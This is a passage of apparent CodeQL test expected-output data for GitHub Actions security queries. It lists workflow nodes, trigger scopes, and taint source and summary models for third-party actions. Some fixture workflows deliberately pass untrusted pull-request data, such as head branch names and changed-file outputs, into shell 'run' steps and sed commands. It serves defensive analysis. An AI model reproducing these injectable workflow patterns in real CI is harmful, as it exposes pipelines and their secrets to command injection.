.github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:5:5:9:2 | .github/workflows/shell.yml@5:5:9:2 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:9:9:2 | .github/workflows/shell.yml@7:9:9:2 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:8:14:8:31 | .github/workflows/shell.yml@8:14:8:31 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:10:5:14:2 | .github/workflows/shell.yml@10:5:14:2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:9:14:2 | .github/workflows/shell.yml@12:9:14:2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:14:12:23 | .github/workflows/shell.yml@12:14:12:23 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:15:5:19:2 | .github/workflows/shell.yml@15:5:19:2 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:9:19:2 | .github/workflows/shell.yml@17:9:19:2 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:18:14:18:23 | .github/workflows/shell.yml@18:14:18:23 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:20:5:22:32 | .github/workflows/shell.yml@20:5:22:32 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:9:22:32 | .github/workflows/shell.yml@22:9:22:32 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:14:22:31 | .github/workflows/shell.yml@22:14:22:31 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | +| tim-actions/get-pr-commits | * | output.commits | text | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | +summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| AsasInnab/regex-action | * | input.search_string | output.first_match | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_first | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_json | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | +| actions-ecosystem/action-regex-match | * | input.text | output.* | taint | manual | +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| dsfx3d/action-extract-unique-matches | * | input.text | output.matches | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kaisugi/action-regex-match | * | input.text | output.* | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | 